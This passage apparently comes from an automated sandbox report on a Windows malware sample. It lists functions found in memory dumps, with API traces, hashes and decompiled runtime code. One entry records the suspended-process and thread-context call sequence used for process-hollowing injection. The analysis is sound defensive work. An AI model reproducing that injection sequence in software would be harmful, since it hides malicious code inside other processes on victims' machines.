VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,000B0190,81AF6D4E,000AFCD3), ref: 000AF7A0
FindCloseChangeNotification.KERNELBASE(81AF6D4E,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,000B0190), ref: 000AF812
VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00000000,00000000,00000000,?), ref: 000AF81D
VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,000B0190,81AF6D4E,000AFCD3,00000000), ref: 000AF868

Memory Dump Source

Source File: 00000000.00000002.646836339.00000000000AF000.00000040.00020000.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.646727734.0000000000090000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.646793640.00000000000A8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646815454.00000000000AE000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647051678.00000000000F2000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
String ID:
API String ID: 656311269-0
Opcode ID: 97b910f21815d8457922ed8ca2e505dd5b440e900b165ea24fa558e1bdbe992b
Instruction ID: e641c2de3f9ef794163a08bed9b66d08d0db483cc2c341375b1c7b05b7d19205
Opcode Fuzzy Hash: 97b910f21815d8457922ed8ca2e505dd5b440e900b165ea24fa558e1bdbe992b
Instruction Fuzzy Hash: 4F517A71E0021AABDB209BF4CC85FEEBBB8EF19714F104529F511FB281EB7499018B64

Uniqueness

Uniqueness Score: -1.00%

Function 000AF0DC, Relevance: 6.3, APIs: 4, Instructions: 335threadprocessinjectionCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,08000004,00000000,00000000,?,?), ref: 000AF206
GetThreadContext.KERNELBASE(?,?), ref: 000AF225
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 000AF245
SetThreadContext.KERNELBASE(?,00010007,?,?,?,00000004,00000000,?,?,?,?,000000FF,?,00000000,00000000,00000000), ref: 000AF402

Memory Dump Source

Source File: 00000000.00000002.646836339.00000000000AF000.00000040.00020000.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.646727734.0000000000090000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.646793640.00000000000A8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646815454.00000000000AE000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647051678.00000000000F2000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ContextProcessThread$CreateMemoryRead
String ID:
API String ID: 3262821800-0
Opcode ID: d953efe4af85d319bc9abbc82787135bbc7d7a650ddf50ad8815eeeae843a890
Instruction ID: 817d9d62dc8787a98ce68dc724886ca217155001a6c27fa33192b4ab3aabf4b1
Opcode Fuzzy Hash: d953efe4af85d319bc9abbc82787135bbc7d7a650ddf50ad8815eeeae843a890
Instruction Fuzzy Hash: B1C15871A0020AABEF219FE4CD45FFEBBB8BF09304F144179E505B6191D774AA85CB60

Uniqueness

Uniqueness Score: -1.00%

Function 000B08B6, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 204COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(00000000), ref: 000B0B52

Strings

D, xrefs: 000B0AF5
5113b86b37df4b07ae03213fe012da79, xrefs: 000B0AA8, 000B0AAB

Memory Dump Source

Source File: 00000000.00000002.646836339.00000000000AF000.00000040.00020000.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.646727734.0000000000090000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.646793640.00000000000A8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646815454.00000000000AE000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647051678.00000000000F2000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ExitProcess
String ID: 5113b86b37df4b07ae03213fe012da79$D
API String ID: 621844428-89965315
Opcode ID: b68e6e79c134320777226aec7a8f657a50630cd056bbb628e4f733a692dc0c4b
Instruction ID: bea06c117843fc2200090a3d433b982027d17c7727e96ae7fc607ddbf07b0209
Opcode Fuzzy Hash: b68e6e79c134320777226aec7a8f657a50630cd056bbb628e4f733a692dc0c4b
Instruction Fuzzy Hash: F3918E30D1438CEEEF12CBE8D845BEEBBB5AF14704F10409AE548BA292D7B50B44DB25

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0009E84E, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0009E84E(short _a4, intOrPtr _a8) {
				short _t13;
				short _t28;

				_t28 = _a4;
				if(_t28 != 0 &&  *_t28 != 0 && E0009DB06(_t28, ?str?) != 0) {
					if(E0009DB06(_t28, ?str?) != 0) {
						return E0009FA26(_t28);
					}
					if(GetLocaleInfoW( *(_a8 + 8), 0x2000000b,  &_a4, 2) == 0) {
						L9:
						return 0;
					}
					return _a4;
				}
				if(GetLocaleInfoW( *(_a8 + 8), 0x20001004,  &_a4, 2) == 0) {
					goto L9;
				}
				_t13 = _a4;
				if(_t13 == 0) {
					return GetACP();
				}
				return _t13;
			}

0x0009e852
0x0009e857
0x0009e87f
0x00000000
0x0009e8a8
0x0009e89a
0x0009e8c6
0x00000000
0x0009e8c6
0x00000000
0x0009e89c
0x0009e8c4
0x00000000
0x00000000
0x0009e8ca
0x0009e8cf
0x0009e8d3
0x0009e8d3
0x0009e8a1

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,0009EB14,?,00000000), ref: 0009E892
GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,0009EB14,?,00000000), ref: 0009E8BC

Strings

ACP, xrefs: 0009E85F
OCP, xrefs: 0009E870

Memory Dump Source

Source File: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.646727734.0000000000090000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646793640.00000000000A8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646815454.00000000000AE000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.646836339.00000000000AF000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647051678.00000000000F2000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 9e090d43eea9a335327901410b945ebeb668dc7c3cf1fc4dbccec634b756ea3f
Instruction ID: 96e007b760a7e163178a3537995941557c481420d99c4008f2930669e74e9fb7
Opcode Fuzzy Hash: 9e090d43eea9a335327901410b945ebeb668dc7c3cf1fc4dbccec634b756ea3f
Instruction Fuzzy Hash: 64014C31241655AAEF60DA95DC85EEB37D8AF057A0B148426FA0CEA192EF30DD80A790

Uniqueness

Uniqueness Score: -1.00%

Function 000930E7, Relevance: 3.0, APIs: 2, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E000930E7(struct _EXCEPTION_POINTERS* _a4) {

				SetUnhandledExceptionFilter(0);
				return UnhandledExceptionFilter(_a4);
			}

0x000930ec
0x000930fc

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,0009407B,?,?,?,00000000), ref: 000930EC
UnhandledExceptionFilter.KERNEL32(?,?,?,00000000), ref: 000930F5

Memory Dump Source

Source File: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.646727734.0000000000090000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646793640.00000000000A8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646815454.00000000000AE000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.646836339.00000000000AF000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647051678.00000000000F2000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: d71c44fc0cd6aff10bda7bb2073218236bbb0eeebe8336bf91ea94883e060f3b
Instruction ID: e60f726e25392d2785d88c3ca6b6d59dd50e83cb81b7ea08a53e3f1435981878
Opcode Fuzzy Hash: d71c44fc0cd6aff10bda7bb2073218236bbb0eeebe8336bf91ea94883e060f3b
Instruction Fuzzy Hash: E5B09231444609EBEA902B91EC0AF893F28EB06662F02C010F70D44060AF7658688BA9

Uniqueness

Uniqueness Score: -1.00%

Function 000CC16C, Relevance: 1.7, Strings: 1, Instructions: 423COMMON

Download Yara Rule

Strings

(, xrefs: 000CC48C

Memory Dump Source

Source File: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.646727734.0000000000090000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.646793640.00000000000A8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646815454.00000000000AE000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.646836339.00000000000AF000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.647051678.00000000000F2000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: eb9aa258a1ce3d6dae371e990a2e16f834bfc8557493f3c3bfa305f16849c5a7
Instruction ID: cb49199f32c388cd4bfdd0126082f488dd6e74d954553bea2dcda93874276a42
Opcode Fuzzy Hash: eb9aa258a1ce3d6dae371e990a2e16f834bfc8557493f3c3bfa305f16849c5a7
Instruction Fuzzy Hash: 31021DB6E006189FDB54CF9AC8805DDFBF2FF88314F1AC1AAD859A7315D6746A418F80

Uniqueness

Uniqueness Score: -1.00%

Function 000CC170, Relevance: 1.7, Strings: 1, Instructions: 423COMMON

Download Yara Rule

Strings

(, xrefs: 000CC48C

Memory Dump Source

Source File: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.646727734.0000000000090000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.646793640.00000000000A8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646815454.00000000000AE000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.646836339.00000000000AF000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.647051678.00000000000F2000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
Instruction ID: 1da593e7c131f1bad83a88301323aae1208744dc520ee674d0b5a4902326c5fd
Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
Instruction Fuzzy Hash: 31021DB6E006189FDB54CF9AC8805DDFBF2FF88314F1AC1AAD859A7315D6746A418F80

Uniqueness

Uniqueness Score: -1.00%

Function 0009771D, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E0009771D(signed int _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _t5;
				signed int _t6;
				int _t8;

				_t5 =  *0xf1af8; // 0xb13f8fed
				_t6 = _t5 ^  *0xaece0;
				if(_t6 == 0) {
					 *0xf071c = _a4;
					_t8 = EnumSystemLocalesW(E00097709, 1);
					 *0xf071c =  *0xf071c & 0x00000000;
					return _t8;
				} else {
					return  *_t6(_a4, _a8, _a12, 0);
				}
			}

0x00097720
0x00097725
0x0009772b
0x00097746
0x0009774b
0x00097751
0x00097759
0x0009772d
0x0009773b
0x0009773b

APIs

EnumSystemLocalesW.KERNEL32(00097709,00000001,?,0009DCD2,0009DD70,00000003,00000000,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0009774B

Memory Dump Source

Source File: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.646727734.0000000000090000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646793640.00000000000A8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646815454.00000000000AE000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.646836339.00000000000AF000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647051678.00000000000F2000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: 3a96c618286733ce8824b0c0f6697a32d03932f6e26bec74c793c92f62d02e83
Instruction ID: 0c4e0e97ef734d0d5ddfbc0b866564ed0754a960f611503a5f68ecbc1639a9b3
Opcode Fuzzy Hash: 3a96c618286733ce8824b0c0f6697a32d03932f6e26bec74c793c92f62d02e83
Instruction Fuzzy Hash: 73E0B632568308EBEF119FE5FC86BA93BA5FB04710F508441F61C4A9A1C6B9B561EF84

Uniqueness

Uniqueness Score: -1.00%

Function 000977A3, Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000002,?,?,00094744,?,?,?,00000002), ref: 000977CA

Memory Dump Source

Source File: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.646727734.0000000000090000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646793640.00000000000A8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646815454.00000000000AE000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.646836339.00000000000AF000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647051678.00000000000F2000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: ab5b58f39654e77532fbba9548e06e0e8a4e67f5b0bad392f222c21806ae6bc2
Instruction ID: b8de68f26b3355fbb5dc6a32658843d7b6b79702433ca41add8fb67c9cb31bd2
Opcode Fuzzy Hash: ab5b58f39654e77532fbba9548e06e0e8a4e67f5b0bad392f222c21806ae6bc2
Instruction Fuzzy Hash: CED06736054509FFAF01AFD4EC06CAA3BA9FB493A5B044805F91C45521DA3AA960AB61

Uniqueness

Uniqueness Score: -1.00%

Function 000930B6, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E000930B6(_Unknown_base(*)()* _a4) {

				return SetUnhandledExceptionFilter(_a4);
			}

0x000930c3

APIs

SetUnhandledExceptionFilter.KERNEL32(?,?,000912D0,00091285), ref: 000930BC

Memory Dump Source

Source File: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.646727734.0000000000090000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646793640.00000000000A8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646815454.00000000000AE000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.646836339.00000000000AF000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647051678.00000000000F2000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: a110dcb07581dca727fd73fb51ae659239382e8a0d5a92057f7dd4eba0f9307a
Instruction ID: 0155d6abf4e33cd83a569d4091a00340239861a0dbbba2641615f0546506edf8
Opcode Fuzzy Hash: a110dcb07581dca727fd73fb51ae659239382e8a0d5a92057f7dd4eba0f9307a
Instruction Fuzzy Hash: 11A0123000010CE78A001B41EC058447F1CD701150701C010F50C000219B3258104694

Uniqueness

Uniqueness Score: -1.00%

Function 000E0AC0, Relevance: 1.4, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

3r+, xrefs: 000E0E12

Memory Dump Source

Source File: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.646727734.0000000000090000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.646793640.00000000000A8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646815454.00000000000AE000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.646836339.00000000000AF000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.647051678.00000000000F2000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: 3r+
API String ID: 0-2693420309
Opcode ID: 9ae43399c64a0b4bf6b4df5803c6c8c3f7c851cefd63560c9e7cb293acac0bb5
Instruction ID: 81311a8a7993b05d114a3ffcc265a55e304034c85c2212f81c3d3ea062d56a4d
Opcode Fuzzy Hash: 9ae43399c64a0b4bf6b4df5803c6c8c3f7c851cefd63560c9e7cb293acac0bb5
Instruction Fuzzy Hash: E1919673919799CFE716CF38D88AB823FB5F352320B48429EC5A1934E6D734215ACB85

Uniqueness

Uniqueness Score: -1.00%

Function 000B2365, Relevance: 1.4, Strings: 1, Instructions: 134COMMON

Download Yara Rule

Strings

, xrefs: 000B24E5

Memory Dump Source

Source File: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.646727734.0000000000090000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.646793640.00000000000A8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646815454.00000000000AE000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.646836339.00000000000AF000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.647051678.00000000000F2000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: b5824543732270ab0b84e6c6534a0c658c0f0c8495c1d5a659de4557b6608cfa
Instruction ID: 927f319b721a6c7adde8d970087cbc2b75e1e1cc2b2cb5c148ae8ee3346c5f03
Opcode Fuzzy Hash: b5824543732270ab0b84e6c6534a0c658c0f0c8495c1d5a659de4557b6608cfa
Instruction Fuzzy Hash: 9B518AB1D152088FEB65CFAADA866DEBBF4FB48310F14C16AD805EB250D374A910CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00091DB2, Relevance: 1.3, APIs: 1, Instructions: 7
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00091DB2() {
				void* _t3;

				_t3 = GetProcessHeap();
				 *0xefd1c = _t3;
				return 0 | _t3 != 0x00000000;
			}

0x00091db2
0x00091dba
0x00091dc6

APIs

GetProcessHeap.KERNEL32(0009111B,000ACCC0,00000014), ref: 00091DB2

Memory Dump Source

Source File: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.646727734.0000000000090000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646793640.00000000000A8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646815454.00000000000AE000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.646836339.00000000000AF000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647051678.00000000000F2000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 54f77e3e6f18219c3c700ab16afd7ba58005082225915124d57b33bfa8198a35
Instruction ID: 921b670373bf5a065e6c80081f72b70734fd0a808102d9bf10aa671e7d768190
Opcode Fuzzy Hash: 54f77e3e6f18219c3c700ab16afd7ba58005082225915124d57b33bfa8198a35
Instruction Fuzzy Hash: 3FB012F03069034767480F397C6415939E47708201310807E7003C61A0DF24C4109F00

Uniqueness

Uniqueness Score: -1.00%

Function 000C52E0, Relevance: .4, Instructions: 435COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.646727734.0000000000090000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.646793640.00000000000A8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.646815454.00000000000AE000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.646836339.00000000000AF000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.647051678.00000000000F2000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
Instruction ID: dd49b2538bf7bd70792acf03e45d2d314302cbdaa9b9314c2a0b2f58503ded07
Opcode Fuzzy Hash: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
Instruction Fuzzy Hash: 9B025E73E547164FE720DE4ACDC4765B3A3EFC8311F5B81B8CA142B613CA39BA525A90

Uniqueness

Uniqueness Score: -1.00%

Function 0009B933, Relevance: .3, Instructions: 345
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0009B933(void* __edx, void* __esi) {
				signed int _t192;
				signed char _t193;
				signed char _t194;
				signed char _t195;
				signed char _t196;
				signed char _t198;
				signed int _t241;
				void* _t287;
				void* _t292;
				void* _t294;
				void* _t296;
				void* _t298;
				void* _t300;
				void* _t302;
				void* _t304;
				void* _t306;
				void* _t308;
				void* _t310;
				void* _t312;
				void* _t314;
				void* _t316;
				void* _t318;
				void* _t320;
				void* _t322;
				void* _t324;
				void* _t326;
				void* _t327;

				_t327 = __esi;
				_t287 = __edx;
				if( *((intOrPtr*)(__esi - 0x1e)) ==  *((intOrPtr*)(__edx - 0x1e))) {
					_t241 = 0;
					L15:
					if(_t241 != 0) {
						goto L2;
					}
					_t193 =  *(_t327 - 0x1a);
					if(_t193 ==  *(_t287 - 0x1a)) {
						_t241 = 0;
						L26:
						if(_t241 != 0) {
							goto L2;
						}
						_t194 =  *(_t327 - 0x16);
						if(_t194 ==  *(_t287 - 0x16)) {
							_t241 = 0;
							L37:
							if(_t241 != 0) {
								goto L2;
							}
							_t195 =  *(_t327 - 0x12);
							if(_t195 ==  *(_t287 - 0x12)) {
								_t241 = 0;
								L48:
								if(_t241 != 0) {
									goto L2;
								}
								_t196 =  *(_t327 - 0xe);
								if(_t196 ==  *(_t287 - 0xe)) {
									_t241 = 0;
									L59:
									if(_t241 != 0) {
										goto L2;
									}
									if( *(_t327 - 0xa) ==  *(_t287 - 0xa)) {
										_t241 = 0;
										L70:
										if(_t241 != 0) {
											goto L2;
										}
										_t198 =  *(_t327 - 6);
										if(_t198 ==  *(_t287 - 6)) {
											_t241 = 0;
											L81:
											if(_t241 == 0 &&  *((intOrPtr*)(_t327 - 2)) ==  *((intOrPtr*)(_t287 - 2))) {
											}
											goto L2;
										}
										_t292 = (_t198 & 0x000000ff) - ( *(_t287 - 6) & 0x000000ff);
										if(_t292 == 0) {
											L74:
											_t294 = ( *(_t327 - 5) & 0x000000ff) - ( *(_t287 - 5) & 0x000000ff);
											if(_t294 == 0) {
												L76:
												_t296 = ( *(_t327 - 4) & 0x000000ff) - ( *(_t287 - 4) & 0x000000ff);
												if(_t296 == 0) {
													L78:
													_t241 = ( *(_t327 - 3) & 0x000000ff) - ( *(_t287 - 3) & 0x000000ff);
													if(_t241 != 0) {
														_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
													}
													goto L81;
												}
												_t241 = (0 | _t296 > 0x00000000) * 2 - 1;
												if(_t241 != 0) {
													goto L2;
												}
												goto L78;
											}
											_t241 = (0 | _t294 > 0x00000000) * 2 - 1;
											if(_t241 != 0) {
												goto L2;
											}
											goto L76;
										}
										_t241 = (0 | _t292 > 0x00000000) * 2 - 1;
										if(_t241 != 0) {
											goto L2;
										}
										goto L74;
									}
									_t298 = ( *(_t327 - 0xa) & 0x000000ff) - ( *(_t287 - 0xa) & 0x000000ff);
									if(_t298 == 0) {
										L63:
										_t300 = ( *(_t327 - 9) & 0x000000ff) - ( *(_t287 - 9) & 0x000000ff);
										if(_t300 == 0) {
											L65:
											_t302 = ( *(_t327 - 8) & 0x000000ff) - ( *(_t287 - 8) & 0x000000ff);
											if(_t302 == 0) {
												L67:
												_t241 = ( *(_t327 - 7) & 0x000000ff) - ( *(_t287 - 7) & 0x000000ff);
												if(_t241 != 0) {
													_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
												}
												goto L70;
											}
											_t241 = (0 | _t302 > 0x00000000) * 2 - 1;
											if(_t241 != 0) {
												goto L2;
											}
											goto L67;
										}
										_t241 = (0 | _t300 > 0x00000000) * 2 - 1;
										if(_t241 != 0) {
											goto L2;
										}
										goto L65;
									}
									_t241 = (0 | _t298 > 0x00000000) * 2 - 1;
									if(_t241 != 0) {
										goto L2;
									}
									goto L63;
								}
								_t304 = (_t196 & 0x000000ff) - ( *(_t287 - 0xe) & 0x000000ff);
								if(_t304 == 0) {
									L52:
									_t306 = ( *(_t327 - 0xd) & 0x000000ff) - ( *(_t287 - 0xd) & 0x000000ff);
									if(_t306 == 0) {
										L54:
										_t308 = ( *(_t327 - 0xc) & 0x000000ff) - ( *(_t287 - 0xc) & 0x000000ff);
										if(_t308 == 0) {
											L56:
											_t241 = ( *(_t327 - 0xb) & 0x000000ff) - ( *(_t287 - 0xb) & 0x000000ff);
											if(_t241 != 0) {
												_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
											}
											goto L59;
										}
										_t241 = (0 | _t308 > 0x00000000) * 2 - 1;
										if(_t241 != 0) {
											goto L2;
										}
										goto L56;
									}
									_t241 = (0 | _t306 > 0x00000000) * 2 - 1;
									if(_t241 != 0) {
										goto L2;
									}
									goto L54;
								}
								_t241 = (0 | _t304 > 0x00000000) * 2 - 1;
								if(_t241 != 0) {
									goto L2;
								}
								goto L52;
							}
							_t310 = (_t195 & 0x000000ff) - ( *(_t287 - 0x12) & 0x000000ff);
							if(_t310 == 0) {
								L41:
								_t312 = ( *(_t327 - 0x11) & 0x000000ff) - ( *(_t287 - 0x11) & 0x000000ff);
								if(_t312 == 0) {
									L43:
									_t314 = ( *(_t327 - 0x10) & 0x000000ff) - ( *(_t287 - 0x10) & 0x000000ff);
									if(_t314 == 0) {
										L45:
										_t241 = ( *(_t327 - 0xf) & 0x000000ff) - ( *(_t287 - 0xf) & 0x000000ff);
										if(_t241 != 0) {
											_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
										}
										goto L48;
									}
									_t241 = (0 | _t314 > 0x00000000) * 2 - 1;
									if(_t241 != 0) {
										goto L2;
									}
									goto L45;
								}
								_t241 = (0 | _t312 > 0x00000000) * 2 - 1;
								if(_t241 != 0) {
									goto L2;
								}
								goto L43;
							}
							_t241 = (0 | _t310 > 0x00000000) * 2 - 1;
							if(_t241 != 0) {
								goto L2;
							}
							goto L41;
						}
						_t316 = (_t194 & 0x000000ff) - ( *(_t287 - 0x16) & 0x000000ff);
						if(_t316 == 0) {
							L30:
							_t318 = ( *(_t327 - 0x15) & 0x000000ff) - ( *(_t287 - 0x15) & 0x000000ff);
							if(_t318 == 0) {
								L32:
								_t320 = ( *(_t327 - 0x14) & 0x000000ff) - ( *(_t287 - 0x14) & 0x000000ff);
								if(_t320 == 0) {
									L34:
									_t241 = ( *(_t327 - 0x13) & 0x000000ff) - ( *(_t287 - 0x13) & 0x000000ff);
									if(_t241 != 0) {
										_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
									}
									goto L37;
								}
								_t241 = (0 | _t320 > 0x00000000) * 2 - 1;
								if(_t241 != 0) {
									goto L2;
								}
								goto L34;
							}
							_t241 = (0 | _t318 > 0x00000000) * 2 - 1;
							if(_t241 != 0) {
								goto L2;
							}
							goto L32;
						}
						_t241 = (0 | _t316 > 0x00000000) * 2 - 1;
						if(_t241 != 0) {
							goto L2;
						}
						goto L30;
					}
					_t322 = (_t193 & 0x000000ff) - ( *(_t287 - 0x1a) & 0x000000ff);
					if(_t322 == 0) {
						L19:
						_t324 = ( *(_t327 - 0x19) & 0x000000ff) - ( *(_t287 - 0x19) & 0x000000ff);
						if(_t324 == 0) {
							L21:
							_t326 = ( *(_t327 - 0x18) & 0x000000ff) - ( *(_t287 - 0x18) & 0x000000ff);
							if(_t326 == 0) {
								L23:
								_t241 = ( *(_t327 - 0x17) & 0x000000ff) - ( *(_t287 - 0x17) & 0x000000ff);
								if(_t241 != 0) {
									_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
								}
								goto L26;
							}
							_t241 = (0 | _t326 > 0x00000000) * 2 - 1;
							if(_t241 != 0) {
								goto L2;
							}
							goto L23;
						}
